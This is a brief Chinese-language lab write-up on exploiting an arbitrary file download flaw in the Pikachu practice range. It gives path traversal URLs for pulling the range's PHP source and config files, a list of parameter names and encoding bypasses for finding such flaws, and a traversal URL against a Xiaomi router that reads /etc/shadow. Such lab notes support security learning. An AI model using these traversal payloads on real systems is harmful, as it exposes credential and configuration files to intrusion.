檔案下載驗證(靶場pikaqu)
靶場報錯:mysqli_connect(): (HY000/1045)
解決辦法:修改資料庫檔案密碼與本地mysql密碼一致;
/WWW/pikachu/inc/config.php和/WWW/pikachu /pkxss/inc/inc/config.php
之後訪問http://www.pikaqu:81/install.php重新配置即可
1、檔案下載得到檔案地址如下;
下載地址為http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=ai.png
圖片地址為http://www.pikaqu:81/vul/unsafedownload/download/ai.png
2、反推下載php檔案地址為
http://www.pikaqu:81/vul/unsafedownload/download/execdownload.php
3、下載改php需跳到前一級目錄,則為unsafedownload下
`http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=../execdownload.php``
4、下載到檔案之後,透過對以下載到php檔案程式碼進一步分析,進行進一步檔案下載路徑探測;
下載根目錄下inc/function.php檔案;
http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=../../../inc/function.php
5、探測資料庫或敏感檔案地址;
- 掃描工具或掃描地址(目錄掃描探測,字典大)
- 下載好程式碼分析和檔案包含獲取
6、使用大字典進行目錄探測資料庫配置檔案,config.inc.php
如何判斷含義檔案下載功能點
1、判斷引數值
read.xxx?filename=
down.xxx?filename=
readfile.xxx?filename=
downfile.xxx?filename=
../ ..\ ./ .\
%00 ?%23 %20等
&readpath= &filepath= &path= &url= &data= &readfile=
2、java中web.xml/WEB-INF檔案
檔案讀取
思路:任意檔案程式碼讀取;
小米路由器任意檔案讀取
http://x.x.x/api-third-party/download/extdisks../etc/shadow
即可下載到